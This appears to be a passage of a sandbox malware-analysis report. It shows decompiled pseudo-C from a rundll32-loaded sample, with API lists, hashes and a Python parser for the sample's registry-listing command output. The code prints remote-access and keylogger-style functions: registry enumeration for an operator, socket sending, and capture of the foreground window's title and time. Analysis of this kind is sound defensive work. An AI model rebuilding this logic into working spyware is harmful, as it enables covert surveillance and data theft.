                                                            • Opcode ID: fe00907668ebc08f86f77bbdc86b42b0b940e7a59b4d2b414db7d1d3f25e852e
                                                            • Instruction ID: 2dbc40bf47dff682011528dd3213a019342437a3f2af06dec8c6b92277629a23
                                                            • Opcode Fuzzy Hash: fe00907668ebc08f86f77bbdc86b42b0b940e7a59b4d2b414db7d1d3f25e852e
                                                            • Instruction Fuzzy Hash: BF214F30200600AFEB285F64E84CB6677A5EB55321F208B19F556C76E0EBB9EC519F50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E04641680(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				short* _v532;
                                                            				short* _v536;
                                                            				short* _v540;
                                                            				void* _v544;
                                                            				int _v548;
                                                            				int _v552;
                                                            				void* _v556;
                                                            				short* _v560;
                                                            				intOrPtr _v564;
                                                            				signed int _t61;
                                                            				short* _t64;
                                                            				short* _t73;
                                                            				int* _t83;
                                                            				intOrPtr* _t84;
                                                            				void* _t102;
                                                            				int _t103;
                                                            				void** _t105;
                                                            				short** _t110;
                                                            				intOrPtr _t113;
                                                            				void* _t117;
                                                            				short* _t120;
                                                            				short* _t121;
                                                            				void* _t122;
                                                            				short* _t125;
                                                            				short* _t126;
                                                            				void* _t128;
                                                            				intOrPtr* _t129;
                                                            				intOrPtr _t131;
                                                            				short* _t132;
                                                            				void* _t134;
                                                            				signed int _t137;
                                                            				void* _t138;
                                                            				void* _t139;
                                                            
                                                            				_t61 =  *0x4684008; // 0xd355be4e, the /GS stack cookie; E04655AFE(_v8 ^ _t137) at the exits is the cookie check
                                                            				_v8 = _t61 ^ _t137;
                                                            				_t131 = _a8;
                                                            				_t119 = _a4;
                                                            				_v564 = __ecx;
                                                            				_v532 = 0;
                                                            				_t105 = _a4 + 1;
                                                            				_t64 = _t131 - 1 + _t105;
                                                            				_v536 = _t105;
                                                            				_v540 = _t64;
                                                            				if(_t64 - _t105 >= 4) {
                                                            					_t102 =  *_t105;
                                                            					_v536 =  &(_t105[1]);
                                                            				} else {
                                                            					_v532 = 1;
                                                            					_t102 = 0;
                                                            				}
                                                            				_v560 = E04640D20( &_v540);
                                                            				if(_v532 != 0) {
                                                            					L20:
                                                            					return E04655AFE(_v8 ^ _t137);
                                                            				} else {
                                                            					_t110 =  &_v540;
                                                            					_v548 = 0;
                                                            					_v532 = 0;
                                                            					_v540 = 0;
                                                            					_v536 = 0;
                                                            					E0463B9C0(_t110, _t131);
                                                            					_t120 = _v536;
                                                            					E0465E060(_t120, _t119, _t131);
                                                            					_t139 = _t138 + 0xc;
                                                            					_t121 = _t120 + _t131;
                                                            					_v536 = _t121;
                                                            					if(RegOpenKeyExW(_t102, _v560, 0, 0x20119,  &_v544) != 0) { // 0x20119 = KEY_READ | KEY_WOW64_64KEY: open the requested key (root handle from the request, path parsed by E04640D20) in the 64-bit view
                                                            						L13:
                                                            						_t72 = _v560;
                                                            						if(_v560 != 0) {
                                                            							L04655B0F(_t72);
                                                            							_t139 = _t139 + 4;
                                                            						}
                                                            						_t132 = _v540;
                                                            						if(_t132 != 0) {
                                                            							_t122 = _t121 - _t132;
                                                            							_t73 = _t132;
                                                            						} else {
                                                            							_t122 = 0;
                                                            							_t73 = 0;
                                                            						}
                                                            						_push(_t110);
                                                            						_push(0x3f);
                                                            						_push(_t122);
                                                            						_push(_t73);
                                                            						E04631C60( *((intOrPtr*)(_v564 + 4))); // pushed right-to-left above, so the callee sees (buffer, length, 0x3f, &_v540) with this = *(_v564 + 4); 0x3f is the id the assembled listing is tagged with
                                                            						if(_t132 != 0) {
                                                            							L04655B0F(_t132);
                                                            						}
                                                            						goto L20;
                                                            					}
                                                            					_t103 = 0;
                                                            					_v552 = 0x104; // 260 WCHARs: capacity of the _v528 subkey-name buffer, reset before every RegEnumKeyExW
                                                            					if(RegEnumKeyExW(_v544, 0,  &_v528,  &_v552, 0, 0, 0, 0) != 0) {
                                                            						L12:
                                                            						RegCloseKey(_v544);
                                                            						goto L13;
                                                            					}
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_v548 = 0;
                                                            						_t103 = _t103 + 1;
                                                            						_t83 = RegOpenKeyExW(_v544,  &_v528, 0, 0x20119,  &_v556);
                                                            						if(_t83 == 0) {
                                                            							RegQueryInfoKeyW(_v556, 0, 0, 0,  &_v548, _t83, _t83, _t83, _t83, _t83, _t83, _t83); // 5th argument is lpcSubKeys: number of subkeys under this child key (stays 0 when the open failed)
                                                            							RegCloseKey(_v556);
                                                            						}
                                                            						_t84 =  &_v528;
                                                            						_t117 = _t84 + 2;
                                                            						do {
                                                            							_t113 =  *_t84;
                                                            							_t84 = _t84 + 2;
                                                            						} while (_t113 != 0);
                                                            						_t134 = 2 + (_t84 - _t117 >> 1) * 2; // byte length of the name including its terminating 0x0000
                                                            						_t124 =  ==  ? 0 : _t121 - _v540;
                                                            						E0463B9C0( &_v540, ( ==  ? 0 : _t121 - _v540) + _t134);
                                                            						_t125 = _v536;
                                                            						E0465E060(_t125,  &_v528, _t134);
                                                            						_t126 = _t125 + _t134;
                                                            						_v536 = _t126;
                                                            						_t139 = _t139 + 0xc;
                                                            						_t128 =  ==  ? 0 : _t126 - _v540;
                                                            						_t110 =  &_v540;
                                                            						_t48 = _t128 + 4; // 0x4
                                                            						E0463B9C0(_t110, _t48);
                                                            						_t129 = _v536;
                                                            						 *_t129 = _v548;
                                                            						_t121 = _t129 + 4;
                                                            						_v552 = 0x104;
                                                            						_v536 = _t121;
                                                            					} while (RegEnumKeyExW(_v544, _t103,  &_v528,  &_v552, 0, 0, 0, 0) == 0);
                                                            					goto L12;
                                                            				}
                                                            			}






































                                                            0x04641689
                                                            0x04641690
                                                            0x04641695
                                                            0x04641699
                                                            0x0464169c
                                                            0x046416a5
                                                            0x046416af
                                                            0x046416b2
                                                            0x046416b4
                                                            0x046416ba
                                                            0x046416c5
                                                            0x046416d5
                                                            0x046416da
                                                            0x046416c7
                                                            0x046416c7
                                                            0x046416d1
                                                            0x046416d1
                                                            0x046416f2
                                                            0x046416f8
                                                            0x04641923
                                                            0x04641933
                                                            0x046416fe
                                                            0x046416ff
                                                            0x04641705
                                                            0x0464170f
                                                            0x04641719
                                                            0x04641723
                                                            0x0464172d
                                                            0x04641734
                                                            0x0464173b
                                                            0x04641740
                                                            0x04641749
                                                            0x0464174b
                                                            0x04641768
                                                            0x046418dc
                                                            0x046418dc
                                                            0x046418e4
                                                            0x046418e7
                                                            0x046418ec
                                                            0x046418ec
                                                            0x046418ef
                                                            0x046418f7
                                                            0x046418ff
                                                            0x04641901
                                                            0x046418f9
                                                            0x046418f9
                                                            0x046418fb
                                                            0x046418fb
                                                            0x04641903
                                                            0x0464190a
                                                            0x0464190c
                                                            0x0464190d
                                                            0x04641911
                                                            0x04641918
                                                            0x0464191b
                                                            0x04641920
                                                            0x00000000
                                                            0x04641918
                                                            0x0464176e
                                                            0x04641770
                                                            0x046417a1
                                                            0x046418d4
                                                            0x046418da
                                                            0x00000000
                                                            0x046418da
                                                            0x046417a7
                                                            0x046417b0
                                                            0x046417b6
                                                            0x046417ce
                                                            0x046417d6
                                                            0x046417de
                                                            0x046417fa
                                                            0x04641806
                                                            0x04641806
                                                            0x04641808
                                                            0x0464180e
                                                            0x04641811
                                                            0x04641811
                                                            0x04641814
                                                            0x04641817
                                                            0x04641822
                                                            0x04641833
                                                            0x04641840
                                                            0x04641845
                                                            0x04641854
                                                            0x0464185f
                                                            0x04641869
                                                            0x0464186f
                                                            0x04641876
                                                            0x04641879
                                                            0x0464187f
                                                            0x04641883
                                                            0x04641888
                                                            0x046418a3
                                                            0x046418ad
                                                            0x046418b0
                                                            0x046418ba
                                                            0x046418cc
                                                            0x00000000
                                                            0x046417b0

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04641760
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000000,00020119,?), ref: 04641793
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,?,?,00000000,00020119,?), ref: 046417D6
                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00020119), ref: 046417FA
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04641806
                                                            • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000104,00000000,00000000,00000000,00000000,00000004,00000000,00020119,?), ref: 046418C0
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 046418DA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEnumOpen$InfoQuery
                                                            • String ID:
                                                            • API String ID: 396531129-0
                                                            • Opcode ID: 4d9c2a3a5bc7146d4deec980226e487af336de20d680231ee1ffc1afb07905b7
                                                            • Instruction ID: e2bf349fd15f464d1eac205619fd260032e41d97c400636a2ddf5b1bc7595d28
                                                            • Opcode Fuzzy Hash: 4d9c2a3a5bc7146d4deec980226e487af336de20d680231ee1ffc1afb07905b7
                                                            • Instruction Fuzzy Hash: F3714CB194122DABDF209F64DC8CBDAB7B8EF54304F100199E509A7251EB70AF848F94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
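The loop in E04641680 above assembles an in-memory listing of a key's subkeys before handing it to E04631C60 with id 0x3f. As an added example (not code from the report or from the sample), the following Python mirrors that loop to show the record layout it implies and provides a parser for it, which is what a traffic decoder for this command needs. It assumes that E0463B9C0 grows the vector-like buffer at &_v540, that E0465E060 is a memcpy, that the request starts with one skipped byte followed by a predefined root key and a UTF-16LE path (read from `_t105 = _a4 + 1; _t102 = *_t105;` and E04640D20), and it does not know the outer framing or encryption that E04631C60 may apply, so only the plaintext payload is handled. All sample data is constructed.

```python
"""Record layout implied by the decompiled loop in E04641680 (assumed, see lead-in):

    [request bytes, echoed verbatim]
    repeated per subkey:
        UTF-16LE subkey name + 0x0000 terminator
        uint32 LE lpcSubKeys of that child (0 if RegOpenKeyExW failed)
"""
import struct

# Constructed request: 1 skipped byte, root key 0x80000002 (HKEY_LOCAL_MACHINE),
# then the key path as a NUL-terminated UTF-16LE string. Layout assumed from the decompile.
SAMPLE_REQUEST = (
    b"\x01"
    + struct.pack("<I", 0x80000002)
    + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\x00".encode("utf-16-le")
)

# Constructed subkey listing: (name, number of subkeys under that child).
SAMPLE_ENTRIES = [("Authentication", 0), ("Run", 3), ("Uninstall", 142)]


def build_record(request: bytes, entries: list[tuple[str, int]]) -> bytes:
    """Mirror the decompiled loop: echo the request, then append each name
    including its terminator (the `2 + (len >> 1) * 2` computation) followed
    by the 4-byte subkey count that RegQueryInfoKeyW wrote into _v548."""
    out = bytearray(request)
    for name, subkey_count in entries:
        out += name.encode("utf-16-le") + b"\x00\x00"
        out += struct.pack("<I", subkey_count)
    return bytes(out)


def parse_record(blob: bytes, request_len: int) -> list[tuple[str, int]]:
    """Inverse of build_record. The request is skipped by length because the
    function copies it back verbatim. The terminator is searched at even
    offsets only: a naive find(b"\\x00\\x00") would match across two UTF-16
    code units such as 'A' (41 00) followed by U+0100 (00 01)."""
    entries: list[tuple[str, int]] = []
    pos = request_len
    while pos < len(blob):
        end = pos
        while blob[end:end + 2] != b"\x00\x00":
            end += 2
            if end + 2 > len(blob):
                raise ValueError("unterminated subkey name at offset %d" % pos)
        name = blob[pos:end].decode("utf-16-le")
        pos = end + 2
        if pos + 4 > len(blob):
            raise ValueError("truncated subkey count at offset %d" % pos)
        (count,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        entries.append((name, count))
    return entries


def demo() -> list[tuple[str, int]]:
    """Round-trip the constructed sample through builder and parser."""
    blob = build_record(SAMPLE_REQUEST, SAMPLE_ENTRIES)
    return parse_record(blob, len(SAMPLE_REQUEST))


if __name__ == "__main__":
    for name, count in demo():
        print("%-20s subkeys=%d" % (name, count))
```

When applying this to captured traffic, the request length must come from the operator's request (or from the decoded framing), because the record carries no length field of its own; the parser raises rather than guessing when a name or count runs past the end of the buffer.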

                                                            C-Code - Quality: 73%
                                                            			E0466ED7F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed char _v15;
                                                            				char _v16;
                                                            				void _v24;
                                                            				short _v28;
                                                            				char _v31;
                                                            				void _v32;
                                                            				long _v36;
                                                            				intOrPtr _v40;
                                                            				void* _v44;
                                                            				signed int _v48;
                                                            				signed char* _v52;
                                                            				long _v56;
                                                            				int _v60;
                                                            				signed int _t78;
                                                            				signed int _t80;
                                                            				int _t86;
                                                            				void* _t94;
                                                            				long _t97;
                                                            				void _t105;
                                                            				void* _t112;
                                                            				signed int _t116;
                                                            				signed int _t118;
                                                            				signed char _t123;
                                                            				signed char _t128;
                                                            				intOrPtr _t129;
                                                            				signed int _t131;
                                                            				signed char* _t133;
                                                            				intOrPtr* _t135;
                                                            				signed int _t136;
                                                            				void* _t137;
                                                            
                                                            				_t78 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t78 ^ _t136;
                                                            				_t80 = _a8;
                                                            				_t118 = _t80 >> 6;
                                                            				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                            				_t133 = _a12;
                                                            				_v52 = _t133;
                                                            				_v48 = _t118;
                                                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4687680 + _t118 * 4)) + _t116 + 0x18));
                                                            				_v40 = _a16 + _t133;
                                                            				_t86 = GetConsoleCP();
                                                            				_t135 = _a4;
                                                            				_v60 = _t86;
                                                            				 *_t135 = 0;
                                                            				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                            				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                            				while(_t133 < _v40) {
                                                            					_v28 = 0;
                                                            					_v31 =  *_t133;
                                                            					_t129 =  *((intOrPtr*)(0x4687680 + _v48 * 4));
                                                            					_t123 =  *(_t129 + _t116 + 0x2d);
                                                            					if((_t123 & 0x00000004) == 0) {
                                                            						if(( *(E0466982A(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                            							_push(1);
                                                            							_push(_t133);
                                                            							goto L8;
                                                            						} else {
                                                            							if(_t133 >= _v40) {
                                                            								_t131 = _v48;
                                                            								 *((char*)( *((intOrPtr*)(0x4687680 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                            								 *( *((intOrPtr*)(0x4687680 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x4687680 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                            							} else {
                                                            								_t112 = E0466AF6D( &_v28, _t133, 2);
                                                            								_t137 = _t137 + 0xc;
                                                            								if(_t112 != 0xffffffff) {
                                                            									_t133 =  &(_t133[1]);
                                                            									goto L9;
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t128 = _t123 & 0x000000fb;
                                                            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                            						_push(2);
                                                            						_v15 = _t128;
                                                            						 *(_t129 + _t116 + 0x2d) = _t128;
                                                            						_push( &_v16);
                                                            						L8:
                                                            						_push( &_v28);
                                                            						_t94 = E0466AF6D();
                                                            						_t137 = _t137 + 0xc;
                                                            						if(_t94 != 0xffffffff) {
                                                            							L9:
                                                            							_t133 =  &(_t133[1]);
                                                            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                            							_v56 = _t97;
                                                            							if(_t97 != 0) {
                                                            								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                            									L19:
                                                            									 *_t135 = GetLastError();
                                                            								} else {
                                                            									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                            									if(_v36 >= _v56) {
                                                            										if(_v31 != 0xa) {
                                                            											goto L16;
                                                            										} else {
                                                            											_t105 = 0xd;
                                                            											_v32 = _t105;
                                                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                            												goto L19;
                                                            											} else {
                                                            												if(_v36 >= 1) {
                                                            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                            													goto L16;
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L20;
                                                            					L16:
                                                            				}
                                                            				L20:
                                                            				return E04655AFE(_v8 ^ _t136);
                                                            			}

                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0466F4F4,?,00000000,?,00000000,00000000), ref: 0466EDC1
                                                            • __fassign.LIBCMT ref: 0466EE3C
                                                            • __fassign.LIBCMT ref: 0466EE57
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0466EE7D
                                                            • WriteFile.KERNEL32(?,?,00000000,0466F4F4,00000000,?,?,?,?,?,?,?,?,?,0466F4F4,?), ref: 0466EE9C
                                                            • WriteFile.KERNEL32(?,?,00000001,0466F4F4,00000000,?,?,?,?,?,?,?,?,?,0466F4F4,?), ref: 0466EED5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: d03760983fa6d2db3dbaac586048664dc31cefe3ec5ea6e31d3825bcf03f14bb
                                                            • Instruction ID: 147fe1d146b4ba563d99a045d9809b231bd537ec8a175957a22be83551aa13f2
                                                            • Opcode Fuzzy Hash: d03760983fa6d2db3dbaac586048664dc31cefe3ec5ea6e31d3825bcf03f14bb
                                                            • Instruction Fuzzy Hash: DA51B6B5A002499FDB14CFA8D845AEEBBF4EF09310F14455EE556E7381F731A941CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E04654580(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				void** _v32;
                                                            				signed int _t53;
                                                            				intOrPtr _t56;
                                                            				long _t61;
                                                            				long* _t68;
                                                            				long _t71;
                                                            				long _t87;
                                                            				intOrPtr _t90;
                                                            				void** _t100;
                                                            				void* _t101;
                                                            				long* _t104;
                                                            				void* _t106;
                                                            				void* _t108;
                                                            				signed int _t109;
                                                            				void* _t110;
                                                            
                                                            				_t90 = __ecx;
                                                            				_t53 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t53 ^ _t109;
                                                            				_v20 = _a8;
                                                            				_t56 = _a12;
                                                            				_v24 = __ecx;
                                                            				_v28 = _a4;
                                                            				if(_t56 <= 0) {
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				} else {
                                                            					_t100 = __ecx + 0x94;
                                                            					_v32 = _t100;
                                                            					do {
                                                            						_v16 = 0;
                                                            						_t87 =  <  ? _t56 :  *((intOrPtr*)(_t90 + 0x18));
                                                            						_v12 = _t87;
                                                            						if(E0464C880( &(_t100[7]),  &_v16) != 0) {
                                                            							_t101 = _v16;
                                                            						} else {
                                                            							_t108 = _t100[4];
                                                            							_t101 = RtlAllocateHeap( *_t100, 0, _t108 + 0x38);
                                                            							_v16 = _t101;
                                                            							 *(_t101 + 0x14) = _v32;
                                                            							_t20 = _t101 + 0x38; // 0x38
                                                            							 *(_t101 + 0x24) = _t108;
                                                            							 *((intOrPtr*)(_t101 + 0x20)) = _t20;
                                                            						}
                                                            						_t24 = _t101 + 0x1c; // 0x1c
                                                            						_t104 = _t24;
                                                            						asm("xorps xmm0, xmm0");
                                                            						asm("movups [edi], xmm0");
                                                            						 *(_t101 + 0x10) = 0;
                                                            						 *_t104 = 0;
                                                            						if(_t87 >= 0) {
                                                            							_t61 = _v12;
                                                            						} else {
                                                            							_t61 =  *(_v24 + 0x18);
                                                            						}
                                                            						 *_t104 = _t61;
                                                            						E0465E060( *((intOrPtr*)(_t101 + 0x20)), _v20, _t87);
                                                            						_t110 = _t110 + 0xc;
                                                            						InterlockedExchangeAdd(_v28 + 0x40, _t87);
                                                            						 *((intOrPtr*)(_t101 + 0x34)) =  *((intOrPtr*)(_v28 + 0x88));
                                                            						_t68 =  &_v12;
                                                            						_v12 = 0;
                                                            						 *((intOrPtr*)(_t101 + 0x18)) = 3;
                                                            						 *(_t101 + 0x28) = 2;
                                                            						__imp__WSASend( *((intOrPtr*)(_t101 + 0x34)), _t104, 1, _t68, 0, _t101, 0);
                                                            						if(_t68 != 0xffffffff) {
                                                            							_t68 = 0;
                                                            						} else {
                                                            							__imp__#111();
                                                            						}
                                                            						_t106 =  !=  ? _t68 : 0;
                                                            						_t40 = _t101 + 0x28; // 0x28
                                                            						if(InterlockedDecrement(_t40) == 0 || _t106 != 0) {
                                                            							_t71 = E0464C930(_v24 + 0xb0, _t101);
                                                            							if(_t71 == 0) {
                                                            								HeapFree( *( *(_t101 + 0x14)), _t71, _t101);
                                                            							}
                                                            							if(_t106 != 0) {
                                                            								InterlockedExchangeAdd(_v28 + 0x40,  ~_t87);
                                                            							} else {
                                                            								goto L16;
                                                            							}
                                                            						} else {
                                                            							goto L16;
                                                            						}
                                                            						break;
                                                            						L16:
                                                            						_t90 = _v24;
                                                            						_t56 = _a12 - _t87;
                                                            						_v20 = _v20 + _t87;
                                                            						_a12 = _t56;
                                                            						_t100 = _t90 + 0x94;
                                                            					} while (_t56 > 0);
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				}
                                                            			}

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 046545E3
                                                            • InterlockedExchangeAdd.KERNEL32(?,?), ref: 04654640
                                                            • WSASend.WS2_32(?,0000001C,00000001,?), ref: 04654676
                                                            • WSAGetLastError.WS2_32 ref: 04654681
                                                            • InterlockedDecrement.KERNEL32(00000028), ref: 04654699
                                                            • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 046546C1
                                                            • InterlockedExchangeAdd.KERNEL32(-0000003D,?), ref: 04654706
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$ExchangeHeap$AllocateDecrementErrorFreeLastSend
                                                            • String ID:
                                                            • API String ID: 319775435-0
                                                            • Opcode ID: 9f56574a94add06e1a130ebfc2662200e8fff0f305bba5cd194c8159aabaf897
                                                            • Instruction ID: 7a7ec9b6707cbd830d3f564d6c45a5b0a4e081afaf7afad0875cd41f15a95dc7
                                                            • Opcode Fuzzy Hash: 9f56574a94add06e1a130ebfc2662200e8fff0f305bba5cd194c8159aabaf897
                                                            • Instruction Fuzzy Hash: E8513D71A0020AAFDB10DFA4C984BAAB7F8FF58304F114269E905D7650EB71F995CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0463B2E0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v532;
                                                            				short _v2580;
                                                            				struct _SYSTEMTIME _v2596;
                                                            				struct HWND__* _v2600;
                                                            				signed int _t35;
                                                            				intOrPtr _t38;
                                                            				struct HWND__* _t39;
                                                            				signed int _t43;
                                                            				intOrPtr _t45;
                                                            				intOrPtr* _t50;
                                                            				signed int _t67;
                                                            				signed int _t68;
                                                            				WCHAR* _t70;
                                                            				void* _t74;
                                                            				signed short* _t76;
                                                            				intOrPtr* _t77;
                                                            				intOrPtr* _t82;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				void* _t86;
                                                            				intOrPtr _t87;
                                                            				intOrPtr* _t89;
                                                            				intOrPtr* _t91;
                                                            				signed int _t93;
                                                            				signed int _t94;
                                                            				void* _t95;
                                                            
                                                            				_t35 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t35 ^ _t94;
                                                            				_t70 = __ecx;
                                                            				if(__ecx == 0) {
                                                            					L24:
                                                            					return E04655AFE(_v8 ^ _t94);
                                                            				}
                                                            				_t91 = __ecx;
                                                            				_t74 = __ecx + 2;
                                                            				do {
                                                            					_t38 =  *_t91;
                                                            					_t91 = _t91 + 2;
                                                            				} while (_t38 != 0);
                                                            				_t93 = _t91 - _t74 >> 1;
                                                            				if(_t93 < 1) {
                                                            					goto L24;
                                                            				}
                                                            				_t39 = GetForegroundWindow();
                                                            				_v2600 = _t39;
                                                            				GetWindowTextW(_t39,  &_v532, 0x101);
                                                            				_t89 =  *0x4687adc; // 0x0
                                                            				if(_v2600 !=  *(_t89 + 8)) {
                                                            					L13:
                                                            					_t76 =  &_v532;
                                                            					_t12 = _t89 + 0xc; // 0xc
                                                            					_t84 = _t12 - _t76;
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_t43 =  *_t76 & 0x0000ffff;
                                                            						_t76 =  &(_t76[1]);
                                                            						 *(_t84 + _t76 - 2) = _t43;
                                                            					} while (_t43 != 0);
                                                            					_t77 =  &_v532;
                                                            					 *(_t89 + 8) = _v2600;
                                                            					_t85 = _t77 + 2;
                                                            					do {
                                                            						_t45 =  *_t77;
                                                            						_t77 = _t77 + 2;
                                                            					} while (_t45 != 0);
                                                            					if(_t77 != _t85) {
                                                            						E0465DEA0(_t89,  &_v2580, 0, 0x800);
                                                            						GetLocalTime( &_v2596);
                                                            						wsprintfW( &_v2580, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]",  &_v532, _v2596.wYear & 0x0000ffff, _v2596.wMonth & 0x0000ffff, _v2596.wDay & 0x0000ffff, _v2596.wHour & 0x0000ffff, _v2596.wMinute & 0x0000ffff, _v2596.wSecond & 0x0000ffff);
                                                            						_t95 = _t95 + 0x30;
                                                            						E0463B2E0(_t70,  &_v2580, _t89, _t93);
                                                            						_t89 =  *0x4687adc; // 0x0
                                                            					}
                                                            					L19:
                                                            					if( *((char*)(_t89 + 0x20c)) != 0) {
                                                            						E0463B1A0(_t70);
                                                            						_t89 =  *0x4687adc; // 0x0
                                                            					}
                                                            					if( *_t89 + _t93 > 0x400) {
                                                            						_t32 = _t89 + 0x416; // 0x416
                                                            						E0465DEA0(_t89, _t32, 0, 0x800);
                                                            						 *_t89 = 0;
                                                            					}
                                                            					_t33 = _t89 + 0x416; // 0x416
                                                            					lstrcatW(_t33, _t70);
                                                            					_t50 =  *0x4687adc; // 0x0
                                                            					 *_t50 =  *_t50 + _t93;
                                                            					goto L24;
                                                            				}
                                                            				_t82 =  &_v532;
                                                            				_t8 = _t89 + 0xc; // 0xc
                                                            				_t67 = _t8;
                                                            				while(1) {
                                                            					_t86 =  *_t67;
                                                            					if(_t86 !=  *_t82) {
                                                            						break;
                                                            					}
                                                            					if(_t86 == 0) {
                                                            						L10:
                                                            						_t68 = 0;
                                                            						L12:
                                                            						if(_t68 == 0) {
                                                            							goto L19;
                                                            						}
                                                            						goto L13;
                                                            					}
                                                            					_t87 =  *((intOrPtr*)(_t67 + 2));
                                                            					if(_t87 !=  *((intOrPtr*)(_t82 + 2))) {
                                                            						break;
                                                            					}
                                                            					_t67 = _t67 + 4;
                                                            					_t82 = _t82 + 4;
                                                            					if(_t87 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L10;
                                                            				}
                                                            				asm("sbb eax, eax");
                                                            				_t68 = _t67 | 0x00000001;
                                                            				goto L12;
                                                            			}
                                                            0x0463b2e9
                                                            0x0463b2f0
                                                            0x0463b2f4
                                                            0x0463b2fa
                                                            0x0463b4a9
                                                            0x0463b4b9
                                                            0x0463b4b9
                                                            0x0463b300
                                                            0x0463b302
                                                            0x0463b305
                                                            0x0463b305
                                                            0x0463b308
                                                            0x0463b30b
                                                            0x0463b312
                                                            0x0463b317
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b31d
                                                            0x0463b32e
                                                            0x0463b336
                                                            0x0463b33c
                                                            0x0463b34b
                                                            0x0463b389
                                                            0x0463b389
                                                            0x0463b38f
                                                            0x0463b394
                                                            0x0463b396
                                                            0x0463b3a0
                                                            0x0463b3a0
                                                            0x0463b3a3
